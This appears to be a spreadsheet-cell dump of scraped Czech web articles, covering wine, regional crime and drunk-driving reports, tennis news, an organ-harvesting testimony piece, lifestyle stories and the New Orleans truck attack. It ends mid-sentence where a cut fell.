    <t>Vinařství Ampelos - Vrbovec 274 /100 19. 6. 2024 „Za mě very very mladé ("Křidýlko nebo stehýnko"). Je zemité, velmi přirozené. Harmonie ve vůni ani v chuti není kdo ví jaká, ale zase Merlot je jemnější odrůda než třeba Pinot Noir, takže to není nijak hrozné. Vůně peckovin (dejme tomu třešně a švesztky), ovšem dřeva a kořenitosti (to přechází do chuti), v chuti jsou citelné taniny, ale nejsou "brutální". Víno je poměrně plné, s delší dochutí. Krásné a nevyumělkované červnené od legendy našeho vinařství (Pán Bůh mu dej zdraví). Ještě potřebuje nějakou dobu zrát, ale souhlasím se slečnoustečkou, že je pitelné už teď.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20250101_12_3698240455_9077b5af4f866102ca2e.html</t>
  </si>
  <si>
    <t>9077b5af4f866102ca2e</t>
  </si>
  <si>
    <t>Nic se nezměnilo, pořád se krade i bourá</t>
  </si>
  <si>
    <t>Nic se nezměnilo, pořád se krade i bourá 1. ledna 2025 Z POLICEJNÍ LINKY - Co řešili v uplynulých dnech policisté v našem regionu? Dopravní nehodu v Kopřivné, odcizení nadité peněženky v Šumperku a v okresním městě také řádil vandal, který prořezal plachty na nákladních autech. Tohle jsou následky nehody opilého řidiče u Kopřivné. Mladík nadýchal více než jednu promile alkoholu . Foto: pčr Opilý řidič havaroval u Kopřivné KOPŘIVNÁ – V šumperské nemocnici skončil v sobotu 21. prosince devatenáctiletý mladík, který ve své škodovce boural mezi Lužnou a Kopřivnou. Řidič nezvládl průjezd zatáčkou, vyjel mimo silnici, kde se auto převrátilo na bok. Přivolaná policejní hlídka naměřila šoférovi 1,2 promile alkoholu v dechu. Zloděj sebral naditou peněženku ŠUMPERK – Bohatého Ježíška si udělal zloděj, který v sobotu 21. prosince našel v Šumperku peněženku. Její majitel ji vytrousil ve Vítězné ulici, a kromě dokladů a platebních karet bylo uvnitř také 20 tisíc korun. Policie případ řeší jako trestný čin zatajení cizí věci. V Šumperku řádil vandal s nožem ŠUMPERK – Škodu za třicet tisíc korun způsobil zloděj, který řádil v ulici J. Zajíce v Šumperku . V noci z pátku 20. na sobotu 21. prosince tam nožem prořízl plachty na dvou nákladních vozidlem. Způsobil v nich díry o velikosti 1,5 x 5 metrů. Pachatel se tak dopustil trestného činu poškození cizí věci. Autor: Jaroslav Kropáč INZERCE Advent klidný rozhodně není. Krade se i bourá Volná místa Autor: Jaroslav Kropáč Autor person Jaroslav Kropáč</t>
  </si>
  <si>
    <t>20250101_120_3696456899_4f41f05ffc63ef4b809a.html</t>
  </si>
  <si>
    <t>4f41f05ffc63ef4b809a</t>
  </si>
  <si>
    <t>Pít nepřestanu. Článek ať vám je berličkou při bourání novoročních slibů</t>
  </si>
  <si>
    <t>Pít nepřestanu. Článek ať vám je berličkou při bourání novoročních slibů Přestat pít v jistém stadiu života je nemožné. Tak snad Vám tenhle článeček bude nějakou tou berličkou, když novoroční slib, že přestanete pít porušíte již prvního ledna. Pít alkoholické nápoje nepřestanu. Nemůžu – a to z více důvodů. Začnu tím, že jsem vyrůstal v letech, kdy alkohol byl společenskou normou, stejně jako cigarety. Jsou to jakési socializační drogy. Kouření a pití alkoholu za mých mladých čas byla aktivita pevně spojená s jakoukoliv společenskou činností, a to soukromou i tou veřejnou. I na střední škole, tam se navázaly a i vyselektovaly první skupiny. Takže kamarádit jsem se i po škole zůstal s lidmi, kterých historky nezačínaly větou, „když jsem jednou jedl salát….“ ale s lidmi, ke kterým mě vázaly historky začínající větou, „a pamatuješ, jak se tehdy Pepa nadral?“ Někdy nepamatuju, ale to nevadí. Pak rodina, kamarádi, práce. Vztahy se vždy utužovali alkoholem , jak v soukromí, tak v práci. Kdo nepil byl tak nějako selektován – pokud tedy nebyl na akci řidičem, a jeho služby byly nadpřínosné. Jistým benefitem taky bylo, že si takový člověk druhý den pamatoval úplně všechno a byl schopný rekapitulovat co kdo řekl, udělal, nebo kde a kdy se ztratil. Z hlediska lékařských statistik jsem regulérní alkoholik, podobně jako všichni, co alkohol pijí. Definice totiž v zásadě praví, že alkoholik je ten, kdo s jistou pravidelností užívá alkohol ke svému uspokojení, a úplně stačí, když ta pravidelnost je na dvoutýdenní bázi, nebo si dá sklenku vína každý druhý večer. Naštěstí nejsem typem alkoholika, který pít musí, ale jisté problémy tam již jsou. Alkohol požívám často, pravidelně a i sám – na oslavu i odbourání stresu. Nestačí mi rajče, ani extra sportovní výkon – alkohol je můj dopamin. Nemůžu – a zkusil jsem to. Nemůžu a nechci se nechat dobrovolně selektovat ze svých sociálních bublin a prostě přestat chlastat . Dokonale jsme i s kámošem úplně abstinoval půl roku. Ke konci již začínalo přibývat otázek proč vlastně a pomalu ale jistě jsme byly jemně odsouváni na druhou kolej. Nezvaní na některé akce apod. V práci mně začali podezřívat, že nemám chřipku, ale minimálně kapavku, když dobrovolně nepiju a jediné co jim pasovalo bylo to, že nepiju kvůli antibiotikům. Přestat pít v jistém stadiu života je nemožné. Tak snad Vám tenhle článeček bude nějakou tou berličkou, když novoroční slib, že přestanete pít porušíte již prvního ledna 😊</t>
  </si>
  <si>
    <t>20250101_121_3696444881_9537c69ad977969296b4.html</t>
  </si>
  <si>
    <t>9537c69ad977969296b4</t>
  </si>
  <si>
    <t>Bývalý čínský úředník varuje před nuceným odběrem orgánů prováděným čínským komunistickým režimem na základě vlastních zkušeností</t>
  </si>
  <si>
    <t>Bývalý čínský úředník varuje před nuceným odběrem orgánů prováděným čínským komunistickým režimem na základě vlastních zkušeností „Každá jednotlivá reklama je důkazem! Každý telefonát je důkazem: orgány jsou veřejně kupovány a prodávány!“ uvádí Du Wen. Bývalý čínský úředník varuje před nuceným odběrem orgánů prováděným komunistickým režimem na základě svých vlastních zkušeností z Číny . Du Wen, bývalý výkonný ředitel Právního poradenského úřadu vlády Autonomní oblasti Vnitřní Mongolsko , byl neprávem uvězněn Komunistickou stranou Číny (KS Číny ) na 12 let, než v roce 2023 odešel do zahraničí a usadil se v Belgii . Během svého pobytu ve vězení se Du na vlastní oči přesvědčil, že orgány odsouzených na smrt jsou odebírány ještě před jejich popravou. Setkal se také se zámožnými vězni, kteří popisovali, jak snadné je získat odpovídající orgán, což naznačovalo, že nemocnice získávají orgány od živých lidí. „Kdysi jsem si říkal: ‚Kde je důkaz?‘ To jsou důkazy!“ prohlásil Du o reklamách na transplantace orgánů, které byly viditelné před velkými nemocnicemi v Pekingu . „Každá taková reklama je důkazem. Každý telefonát je důkazem: orgány jsou veřejně kupovány a prodávány,“ sdělil čínské edici deníku Epoch Times 16. prosince. „[Reklamy uvádějí], ‚Pokud vaše shoda [orgánu] nebude úspěšná, zavolejte na toto číslo a my vám shodu zajistíme.‘ Jakmile zaplatíte dostatečně vysokou částku, zajmou živého člověka, odeberou mu orgány a prodají je,“ poznamenává. „Mají celý organizovaný systém, s lékaři a vším… Jde o rozsáhlé odebírání orgánů od živých lidí,“ dodává. Schéma masového zabíjení pro zisk prostřednictvím nuceného odebírání orgánů, které provozuje KS Číny , existuje v Číně nejméně od 90. let . Londýnský nezávislý tribunál China Tribunal v roce 2019 jednomyslně dospěl k závěru, že vězni svědomí byli – a stále jsou – v Číně zabíjeni kvůli svým orgánům „v podstatném rozsahu“. Za poslední dvě desetiletí byli hlavními oběťmi nuceného odebírání orgánů praktikující Falun Gongu, známého také jako Falun Dafa, což je meditační a duchovní praxe založená na principech pravdivosti, soucitu a tolerance. Letos problém nuceného odebírání orgánů získal větší pozornost, když první známý přeživší utekl do Spojených států a veřejně promluvil. Tři fáze k pravdě Co se týká téměř dvacetiletého úsilí komunity Falun Gongu, která volá po ukončení nuceného odebírání orgánů čínským režimem, Du zmiňuje, že sám prošel třemi fázemi pochopení toho, co se děje. První fází byla nedůvěra. „Jako normální člověk jsem tomu nevěřil. Nucené odebírání orgánů? Za žádných okolností jsem si to nedokázal představit, protože to není něco, co by dělal člověk – to dělají jen bestie,“ konstatuje. „Slyšel jsem o tom dlouho, [ale pořád jsem si] myslel, že si to praktikující Falun Gongu vymýšlejí,“ přiznal. Praktikující Falun Gongu se účastní průvodu v New Yorku 10. května 2024 na oslavu Světového dne Falun Dafa a zároveň upozorňují na perzekuci duchovní praxe v Číně . Transparenty, které drží, informují o státem organizovaném nuceném odebírání orgánů, jehož hlavními cíli jsou právě praktikující Falun Gongu. (Samira Bouaou / Epoch Times) Vězni odsouzení k smrti Druhou fází bylo uvědomění si, že KS Číny odebírá orgány vězňům odsouzeným k smrti. Du strávil šest let v detenčním centru, během kterých viděl 32 osob odcházet ze svých cel poté, co byly odsouzeny k trestu smrti. Někdy těmto vězňům pomáhal psát žádosti o darování orgánů. Jednoho dne měli Du a jeden z odsouzených vězňů stanovené slyšení ve stejnou dobu. Du se zeptal soudního úředníka: „Jak se teď vykonává trest smrti? Dříve museli ti, co byli popraveni zastřelením, platit za kulky. Slyšel jsem, že nyní se [trest smrti] provádí injekcí. Platí odsouzení za injekci?“ Soudní úředník odpověděl, že injekce stojí 2 800 jüanů (cca 8 700 Kč), ale nyní už odsouzení k smrti nemusí platit. Du se zeptal, proč. Úředník odpověděl, že nyní stačí podat anestézii, odebrat orgány a člověk zemře, takže už není třeba další injekce. „Tehdy jsem si uvědomil, že odběr orgánů od živých lidí skutečně existuje,“ sdílí Du. „Policie mi jasně řekla, abych o orgánech nepřemýšlel. [Oni] vám vezmou všechny orgány… a za to nedostanete žádnou kompenzaci. Je to, jako byste to ‚vraceli společnosti‘.“ Po propuštění z vězení se Du zeptal starého přítele ze soudního systému, který mu potvrdil, že odsouzení k smrti už nedostávají injekce. „Soudní lékař kontaktuje spřátelenou nemocnici, lékaři tam přijdou a odeberou orgány. Poté [tělo] spálí. Rodina tělo nevidí, není to povoleno, ukážou jim jen popel.“ Bohatí vězni, kteří podstoupili transplantace V tu chvíli Du dosáhl třetí fáze porozumění – nakonec uvěřil, že čínská komunistická strana skutečně provádí odběry orgánů od praktikujících Falun Gongu. „Potkal jsem několik bohatých spoluvězňů, kteří podstoupili transplantace orgánů, především jater a ledvin. Někteří zaplatili 3 miliony jüanů (cca 9,3 milionu Kč), jiní 2 miliony jüanů (cca 6,2 milionu Kč) a nejlevnější byla za 900 000 jüanů (cca 2,8 milionu Kč).“ Du se jich zeptal, jak transplantace získali, a bylo mu řečeno: „Někdo vám to zařídí, někdo orgány prodá, vy jen zaplatíte a o zbytek se nestaráte.“ „Rozsah toho všeho může výrazně překračovat očekávání lidí zvenčí, protože jen v jedné malé části naší věznice tolik lidí podstoupilo transplantace jater a ledvin,“ podotýká Du. „Odkud tyto orgány pocházely? Kolik jich bylo skutečně darováno?“ ptá se. Lékaři nesoucí orgány pro transplantaci v nemocnici v provincii Henan , 16. srpna 2012. (Snímek obrazovky / Sohu.com) Rozdíly v cenách orgánů podle informací, které Du získal po svém propuštění z vězení, závisí na věku dárce. „Je to velmi jednoduchá logika – orgány praktikujících Falun Gongu jsou zdravější, protože nekouří ani nepijí alkohol ,“ vysvětluje. „Dalším faktorem je věk; pokud je člověk příliš mladý, dětské orgány také nejsou vhodné. Nejlepší orgány pocházejí od lidí ve věku mezi 16 a 22 lety.“ Du dodává, že tento systém vytváří problém „ vražd na objednávku “. „Pokud je shoda orgánu vězně úspěšná, bez ohledu na to, zda je jeho zločin lehký nebo závažný, je stále odsouzen k smrti,“ uvádí. Du, který má také zkušenosti z médií, zmiňuje případ ženy, která mu řekla, že po sterilizaci vaječníků zjistila, že jí chybí jedna ledvina. „Požádala mě, jestli bych jí mohl pomoci. Řekl jsem jí, že by to rozhodně mělo být nahlášeno, a pokud ne, že bych kontaktoval média. Když jsme o tom diskutovali, požádal jsem ji, aby si připravila lékařské zprávy a další dokumenty, ale poté tato osoba zmizela a už jsem ji nikdy nenašel,“ vzpomíná. „Stalo se to loni,“ dodává, těsně předtím, než opustil Čínu . Na zprávě se podílel Shi Ping. – ete – Autor: Cindy Li Autor person Cindy Li</t>
  </si>
  <si>
    <t>4730</t>
  </si>
  <si>
    <t>20250101_122_3696473784_92c919be6bbb93decaa9.html</t>
  </si>
  <si>
    <t>92c919be6bbb93decaa9</t>
  </si>
  <si>
    <t>Anna (25): Přítel mě na Silvestra požádal o ruku, během dvou hodin bylo ale po zásnubách</t>
  </si>
  <si>
    <t>Anna (25): Přítel mě na Silvestra požádal o ruku, během dvou hodin bylo ale po zásnubách Anna prožila na Silvestra okamžik, o kterém dlouho snila - přítel jí požádal o ruku. Radost, ale po dvou hodinách vystřídal vztek. Přistihla svého milého při podezřelém telefonátu s jinou ženou. Poslední den loňského roku jsme slavili s partou přátel. Všichni byli veselí, tancovalo se, veselilo a půlnoc se blížila. Můj přítel David byl celý večer tajuplný a přisuzovala jsem to sváteční atmosféře. Když zbývaly poslední vteřiny starého roku, David najednou poklekl na kolena a v ruce držel malou krabičku. Mohlo by Vás zajímat: Ondřej (30): Po flašce vína nepraskla jenom jedna nevěra. Teď váhám, jestli nemám zrušit zasnoubení Nebyla jsem dojetím schopná slov Překvapením se mi zastavil se dech. David mi s úsměvem na rtech položil tu otázku, kterou jsem už dlouho chtěla slyšet: „Vezmeš si mě?“ Byla to scéna jako z pohádky . Dojetím jsem nebyla schopna slov a jen přikývla. Dav kolem nás propukl v jásot. Objímali jsme se, přijímali gratulace a já si užívala ten božský pocit. Nejšťastnější rok mého života právě začíná, říkala jsem si. Mohlo by Vás zajímat: Kristýna (44): Přítelova nevěra praskla kvůli sousedovi. Když jsem otevřela dveře výtahu, nestačila jsem se divit Dvě hodiny po zasnoubení nevěra? Když už oslava pomalu končila, šla jsem hledat Davida, který se někam ztratit. Zahlédla jsem ho venku na balkoně, jak telefonuje. Neviděl mě a bohužel jsem zaslechla, co říká: „Miluju tě, ale dneska prostě nemůžu. Je tady moc lidí. Zavolám zítra,“ šeptal někomu do telefonu. Zůstala jsem stát jako socha, srdce mi bušilo jako na poplach. Dvě hodiny po zasnoubení je mi nevěrný? Jakmile mě spatřil, hovor rychle ukončil. „Kdo to byl?“ zeptala jsem se hned. „Kolega z práce. Chtěl něco ohledně uzávěrky,“ odpověděl a rychle uhnul pohledem. Mohlo by Vás zajímat: Nela (45): Manželova nevěra mi hnula žlučí, ale odpustila jsem mu. Jenže dcera se s tím nedokáže smířit Zásnuby jsme nakonec odložili Celou noc jsem z toho nespala a zásnubní prstýnek vzteky sundala. Druhý den ráno jsem Davida donutila, aby se přiznal, komu volal. „Prosím tě, to byla moje bývalá. Občas si zavoláme, ale jen jako kamarádi.“ Takhle se chová muž, který mě před pár hodinami požádal o ruku? Cítila jsem zklamání a zlost zároveň. U jednoho známého jsem si ověřila, že se s bývalou pořád stýká a nakonec jsme zásnuby odložili . Co bude dál v tuhle chvíli nevím. Zklamal moji důvěru a nevím, jestli to půjde vrátit zpátky. Další příběhy ze života → Mohlo by Vás zajímat: Svatava (43): Manželova nevěra byla ránou z čistého nebe. Provalila se náhodou v restauraci díky všímavé servírce Text byl zpracován na základě skutečného příběhu, fotografie je jen ilustrační. Máte podobnou zkušenost? Svěřte se nám se svým příběhem, napište na redakce@lifee.cz . Jak jíst v padesáti, abyste si jídlo užívaly a nepřibíraly: Rady oblíbených gurmánek Dity a Karolíny Autor: Nina Svobodová Autor person Nina Svobodová</t>
  </si>
  <si>
    <t>166630</t>
  </si>
  <si>
    <t>20250101_123_3696567263_17cbba3b4af5ce27fa96.html</t>
  </si>
  <si>
    <t>17cbba3b4af5ce27fa96</t>
  </si>
  <si>
    <t>Týden #2: Vondroušová se v Adelaide vrátí po operaci, Siniaková s Bouzkovou musí do kvalifikace</t>
  </si>
  <si>
    <t>Týden #2: Vondroušová se v Adelaide vrátí po operaci, Siniaková s Bouzkovou musí do kvalifikace to sou takovy ty navstevy, kdy po zdvorilym pozdravu naleduje trapne ticho Pak tu pustenou televizi uplne chapu Reagovat Blondie 15.12.2024 21:35 To se ti stává?:D to je blbý, no... není lepší pak odejít, než se trápit v trapném tichu?:D Reagovat Blondie 15.12.2024 21:33 Lol, když ty lidi vidíš asi milionkrát do roka, tak ano, občas si prostě večer pustíte i televizi, protože spolu třeba odpočíváte ;) málokdy, ale někdy jo. Dokonce i na tenis se spolu někdy mrkneme:D být u nejlepší kamarádky v sobotu, určitě si taky kecáme u SD, protože mně je to sice srdečně jedno, ale ona tanec zbožňuje. Můj ty bože, já občas pozvu kamarády na film! Gasp!:D Reagovat frenkie57 15.12.2024 15:04 , tak to by asi nenapadlo. Ale pořad nehejtím, patří určitě mezi to lepší, co ČT produkuje(byť je to převzatý formát, podobně jako ČSHT). Reagovat Entry list pro Hong Kong : učící se Tien. Ach ty translatory fiftyn15 07.12.2024 23:41 Lindě věřím, že to zvládne. Zrovna ona bude jednou z těch hráček, co znají jako víno . Žádná vyhoněná rychlokvaška. Pamatuji si, když jako dítě vyhrála mistrovství Evropy družstev. Už tehdy to měla tenisově v hlavě velmi dobře srovnané. Na svůj věk je po všech stránkách velmi vyspělá. Tenis nehraje kvůli rodičům. Ti ji jen podporovali, má svou vnitřní motivaci a to je nejdůležitější Linda jen poroste. Držím pěsti Reagovat Těžká obhajoba pro Lindu N semifinále. Reagovat jih 07.12.2024 17:16 Jo jo. Hlavně taky loni, když se vezme celá Austrálie , tak bodově obhájila předloňské finále a ještě přidala něco navíc. Třetí rok po sobě těžko bude takové posvícení... Reagovat Hned první týden nové sezony s Maruškou Zbývají už jen 3 týdny. Reagovat Nový komentář Komentáře mohou přidávat pouze registrovaní uživatelé. Jste-li již zaregistrován, přihlašte se vyplněním svého loginu a hesla vpravo nahoře na stránce. Nahlásit nelegální obsah můžete zde. 16:00 Australian Open: Rozlosování kvalifikantek (Q) P. Kuděrmetovová - (23) Frechová (Q) Fettová - Vondroušová (Q) Zidanšeková - Potapovová (Q) Todoniová - (5) Qinwen Zheng (Q) Jeanjeanová - Burrageová (Q) Erjavecová - Lamensová (Q) Chwaliňská - Niemeierová (Q) Hibinová - (17) Kosťuková (Q) Golubicová - Mertensová (Q) Ruseová - Beguová (Q) Aiavaová - Minnenová (Q) Snigurová - (10) Collinsová (Q) Rieraová - (15) Haddadová Maiaová (Q) Bejlek - Dolehideová (Q) Sijia Wei - (4) Paoliniová (Q) Birrellová - (13) Kalinská (LL) Martičová - Cristianová | kompletní los | 16:00 Australian Open: Rozlosování kvalifikantů (Q) Landaluce - McCabe (Q) Boyer - Coría (Q) Garín - Čorič (Q) Majchrzak - Carreňo (Q) Fonseca - (9) Rubljov (Q) Krueger- Hijikata (Q) Tien - Ugo Carabelli (Q) Faria - Kotov (Q) Onclin - Opelka (Q) Klein - (22) Korda (Q) Koepfer - (27) Thompson (Q) Dougaz - Nišioka (Q) Basilašvili - Menšík (Q) Monteiro - Nišikori (Q) Gigante - (14) Humbert (Q) Habíb - Yunchaokete Bu | kompletní los | 15:28 Bartůňková si hned po dopingovém trestu zahraje o finále Nikola Bartůňková se na malém turnaji W15 v norském Oslu vrací na kurty po šestiměsíčním dopingovém trestu a hned na první akci si zahraje o postup do finále. Osmnáctiletá Češka pokračuje bez ztráty setu, ve čtvrtfinále si poradila 6:4, 6:3 s Emily Seiboldovou z Německa a v semifinále změří síly s Anouck Vranckenovou Peetersovou (H2H 0:0). 14:02 Putincevová po více než třech hodinách udolala Šnajderovou Julia Putincevová zvládla úvodní dvě kola v Adelaide s přehledem, když nedala šanci Donně Vekičové ani Ons Jabeurové . Ve čtvrtfinále se ale rvala tři hodiny a čtvrt s kometou loňské sezony Dianou Šnajderovou, proti níž v tie-breaku druhé sady nevyužila dva mečboly. Souboj ruských rodaček nakonec vyhrála 7:6, 6:7, 6:4 a ve svém prvním semifinále na betonech od září 2023 vyzve turnajovou jedničku Jessicu Pegulaovou ( H2H 0:2 ). 10:46 Mertensová zvládla divoký tříseťák s Kuděrmetovovou Elise Mertensová pokračuje na menší akci v Hobartu v obhajobě loňské finálové účasti. Šampionka ročníků 2017-18 porazila v divokém čtvrtfinálovém duelu 6:1, 0:6, 6:2 trápící se Veroniku Kuděrmetovovou a v semifinále nastoupí proti domácí senzaci Maye Jointové (H2H 0:0). 10:10 Keysová už podesáté porazila Kasatkinovou Madison Keysová v Adelaide po skalpu loňské šampionky Jeleny Ostapenkové smetla 6:1, 6:3 Darju Kasatkinovou , která v tomto dějišti hrála v posledních dvou letech finále, a upravila vzájemnou bilanci s Ruskou na 10:2. Američanka tak prošla do svého prvního semifinále na betonech od předloňského US Open a o premiérové hardové finále po triumfu v roce 2022 právě v Adelaide bude usilovat proti další ruské hráčce Ljudmile Samsonovové ( H2H 4:1 ). 09:07 Menšík prohrál další bitvu s Borgesem Jakub Menšík skončil na poslední generálce v novozélandském Aucklandu před branami semifinále. Rodák z Prostějova podlehl 7:6, 2:6, 6:7 Nunovi Borgesovi, proti kterému na nedávném US Open nevyužil tři mečboly. Ve čtvrtfinálových duelech neuspěl talentovaný teenager už počtvrté v řadě. Portugalec se o finále popere se Zizouem Bergsem ( H2H 1:0 ). Více informací najdete v článku. 08:33 Korda je hned po pauze v semifinále Sebastian Korda absolvuje v Adelaide svůj první turnaj od US Open a po operaci lokte a i při třetím startu v tomto dějišti postoupil do semifinále. Po jasné výhře nad Alejandrem Davidovichem měl nakonec ve čtvrtfinále volno, jelikož domácí Thanasi Kokkinakis odstoupil. O zopakování předloňského finále se Američan s českými kořeny utká s Miomirem Kecmanovičem , který do semifinále prošel poprvé od října 2023. 07:54 Bejlek prošla kvalifikací Australian Open i potřetí Sára Bejlek i potřetí zvládla tříkolovou kvalifikaci na Australian Open a bude mít další příležitost zaútočit na svou premiérovou výhru v hlavních soutěžích grandslamů. Osmnáctiletá Češka porazila ve finále kvalifikace 7:5, 6:3 bývalou světovou jednadvacítku Jil Teichmannovou. Více informací najdete v článku. 07:04 B. Fruhvirtová ve finále kvalifikace AO neuspěla Brenda Fruhvirtová prošla při obou předchozích startech na Australian Open kvalifikací a loni se dostala až do druhého kola. Letos však v hlavní soutěži účinkovat nebude, 17letá Češka ve finále kvalifikačních bojů podlehla 3:6, 4:6 Maje Chwaliňské. Více informací najdete v článku. Autor: Ondřej Jirásek Autor person Ondřej Jirásek Rubrika transition_slide Aktuality</t>
  </si>
  <si>
    <t>15410</t>
  </si>
  <si>
    <t>19650</t>
  </si>
  <si>
    <t>20250101_124_3696444252_22430f617888ae2e0425.html</t>
  </si>
  <si>
    <t>22430f617888ae2e0425</t>
  </si>
  <si>
    <t>Věc, kterou dělá většina lidí špatně: Co se děje s vodou při opakovaném ohřívání</t>
  </si>
  <si>
    <t>Věc, kterou dělá většina lidí špatně: Co se děje s vodou při opakovaném ohřívání pitná voda, zdraví Možná to děláte také – v rychlosti zapnete konvici s vodou, která tam zbyla od včerejška. Je to běžný zvyk, který většina lidí vůbec neřeší. Jenže opakované vaření může způsobit, že se ve vodě začnou hromadit škodlivé látky. Převařování vody je osvědčený a spolehlivý způsob dezinfekce. Pokud vodu vaříme, mění se tím její složení. Jedno převaření vodě nevadí a může být i prospěšné, protože kromě dezinfekce ji také zbaví těkavých látek a plynů, které běžně obsahuje. Pokud bychom ale vodu převařili znovu, mohli bychom dosáhnout další změny složení, která už nemusí být žádoucí. Ve vodě, která je převařená více než jednou, se totiž mohou začít hromadit nebezpečné látky. Jedno převaření vodě nevadí Zdroj Shutterstock Složení vody z kohoutku Voda z kohoutku není stoprocentně čistá, nemá vždy ideální složení a může obsahovat různé nečistoty, včetně chlóru, který se používá k dezinfekci vody, nebo hořčíku a vápenatých solí, které se usazují na vnitřních stěnách konvice. Kromě toho můžeme ve vodě v malém množství nalézt také těžké kovy, včetně zinku, olova a stroncia. Co se děje při vaření vody? Vařením vody se mění její složení. Dlouhým vařením a několikanásobným převařováním skutečně dochází k hromadění škodlivých látek, pokud se v ní tyto látky nacházejí. V tomto případě jde především o arsen a dusičnany, které se ve vodě opravdu vyskytovat mohou. Dále vařící se voda koncentruje minerální soli. Kapalina se při dosažení bodu varu odpařuje, ale soli zůstávají a shromažďují se. Jedná se o přirozený chemický proces, který můžeme vidět v momentě, kdy se soli srážejí a vytvoří vodní kámen. Kvalita vody v Česku Pravdou je, že pokud necháte v konvici vodu delší dobu stát a pak ji několikrát převaříte, zvyšuje se tím obsah chemických látek. To platí ale pouze v případě, že se tyto látky ve vodě již vyskytují. Pokud v ní nejsou, nemohou se v ní ani hromadit. V naprosté většině případů poskytují veřejné vodovody v Česku kvalitní pitnou vodu, kterou nejenže nemusíme převařovat, ale kterou se také nemusíme bát převařit znovu, pokud jsme si zapomněli včas zalít kávu nebo čaj. Arzen a dusičnany v pitné vodě Ačkoliv voda z kohoutku není destilovaná a může obsahovat různé nečistoty a minerály, není potřeba se při její konzumaci bát o zdraví. A to ani kvůli obsahu arzenu či dusičnanů. Monitoring kvality pitné vody a potravin prováděný Státním zdravotním ústavem ukazuje, že průměrný Čech ani zdaleka nevyčerpá povolené bezpečné množství arzenu a dusičnanů. Není tedy důvod se bát pitné vody, ani pokud projde opakovaným varem. Významnější zdroj arsenu totiž tvoří ryby, pivo a rýže. V případě dusičnanů se nám jich nejvíce do těla dostává z brambor, uzenin a piva . Obáváte-li se dusičnanů a arzenu, je zbytečné vylévat vodu, která prošla varem. Vhodnější je omezit spotřebu uzenin a piva . Není důvod se bát vody která prošla opakovaným varem Zdroj Shutterstock Proč nevařit vodu opakovaně? Přesto kromě zdravotních rizik existují důvody, proč bychom neměli vařit stejnou vodu několikrát. Každým dalším převařením se ve vodě hromadí minerály, které se proměňují v nerozpustný vodní kámen. Ten se pak usazuje nejen v konvici, ale dostane se i do našeho hrníčku. Přestože jsou tyto částečky pro naše tělo neškodné, je vhodné konvici pravidelně čistit, abychom si tak zbytečně nezkazili chuť nápoje. Navíc ve vodě převařené několikrát dokola chybí kyslík, bez kterého nemá například káva šanci rozvinout své aroma a bude chutnat stejně jako včerejší šálek. Po dvanácti hodinách stání totiž voda ztrácí své vlastnosti, má horší chuť a k přípravě dobrého nápoje se už prostě nehodí. Z hlediska úspory energie je také lepší vždy vařit jen takové množství vody, které zrovna potřebujeme. Autor: Nina Balažovičová Autor person Nina Balažovičová</t>
  </si>
  <si>
    <t>10740</t>
  </si>
  <si>
    <t>20250101_125_3710153108_a099318bfb5769a58bf1.html</t>
  </si>
  <si>
    <t>a099318bfb5769a58bf1</t>
  </si>
  <si>
    <t>Opilý řidič srazil ženu a ujel</t>
  </si>
  <si>
    <t>Opilý řidič srazil ženu a ujel Redakce 03. 01. 2025 MORAVSKÉ BUDĚJOVICE - Ve čtvrtek 2. ledna jel kolem desáté hodiny dopoledne řidič vozidla Škoda Fabia v Moravských Budějovicích po komunikaci v prostoru parkoviště v lokalitě ulice Tyršova. Při jízdě narazil do chodkyně, která v tu dobu silnici přecházela. Čtyřiasedmdesátiletá žena utrpěla při nehodě zranění. Řidič nezůstal na místě dopravní nehody a odjel. Zraněnou chodkyni odvezla zdravotnická záchranná služba do nemocnice. Policisté začali po přijetí oznámení po řidiči pátrat, v krátké době ho nalezli v obci Jakubov . U třiatřicetiletého muže provedli dechovou zkoušku, při které mu naměřili hodnotu 2,84 promile alkoholu . Také opakovaná zkouška u něho ukázala obdobnou hodnotu. Řidič se dále podrobil lékařskému vyšetření spojenému s odběrem krve. Policisté opilého muže zajistili a odvezli ho na protialkoholní záchytnou stanici k vystřízlivění. Místo nehody ohledali, zadokumentovali a zajistili stopy. Dopravní nehodu a veškeré její související okolnosti policisté šetří. Úkony trestního řízení jsou zahájeny pro podezření ze spáchání trestného činu ohrožení pod vlivem návykové látky. 0</t>
  </si>
  <si>
    <t>164</t>
  </si>
  <si>
    <t>158</t>
  </si>
  <si>
    <t>20250101_126_3696381198_e912da8265908d8b5491.html</t>
  </si>
  <si>
    <t>e912da8265908d8b5491</t>
  </si>
  <si>
    <t>V New Orleans vjelo do davu auto. Deset lidí zemřelo, řidiče policie zastřelila</t>
  </si>
  <si>
    <t>V New Orleans vjelo do davu auto. Deset lidí zemřelo, řidiče policie zastřelila ČTK Záchranáři a policisté v ulicích New Orleans poté, co do davu lidí vjelo auto. Autor ▪ AP Photo/Gerald Herbert D eset lidí dnes zemřelo a další tři desítky osob utrpěly zranění ve městě New Orleans poté, co nákladní auto vjelo do davu lidí, kteří ještě slavili příchod nového roku. Informovala o tom agentura AP a další americká média. Stanice CNN s odvoláním na policii uvedla, že najetí do lidí bylo zřejmě úmyslné. Starostka města LaToya Cantrellová čin označila za „teroristický útok“, nicméně dodala, že stále probíhá vyšetřování. „Muž řídil pickup a jel po Bourbon Street velmi rychle, bylo to velmi úmyslné chování,“ řekla novinářům Anne Kirkpatricková z neworleanské policie. Podle ní se muž snažil přejet co nejvíce lidí. Dodala, že nebyl pod vlivem alkoholu a že postřelil dva policisty. Jejich zdravotní stav je stabilizovaný. Většina ze 30 zraněných jsou podle ní místní obyvatelé, nikoli návštěvníci města. „Spolupracujeme s našimi partnery na vyšetřování tohoto útoku jako teroristického činu,“ uvádí se v prohlášení FBI , který případ převzal. FBI rovněž potvrdil předchozí informaci televize CNN a agentury AP, že podezřelého z útoku policie zastřelila. „Dotyčný zaútočil na příslušníky orgánů činných v trestním řízení a nyní je po smrti,“ uvedl úřad. Auto vjelo do davu lidí asi tři hodiny po půlnoci místního času (kolem 10:00 SEČ) na ulici Bourbon Street, která je proslulá rušným nočním životem. Stanice CNN uvedla, že New Orleans se dnes večer také chystá na čtvrtfinále akce Sugar Bowl, v něm se utkají týmy dvou univerzit v zápase amerického fotbalu. Podle stanice CNN vyšetřovatelé FBI ověřují i možnost, že ve voze bylo funkční výbušné zařízení. „Byla nalezena improvizovaná výbušná zařízení a snažíme se potvrdit, zda byla použitelná,“ citovala CNN kancelář FBI v New Orleans . O tragické události byl zpraven prezident Joe Biden a Bílý dům je v kontaktu se starostkou Cantrellovou. Prezident bude nadále informován o vývoji 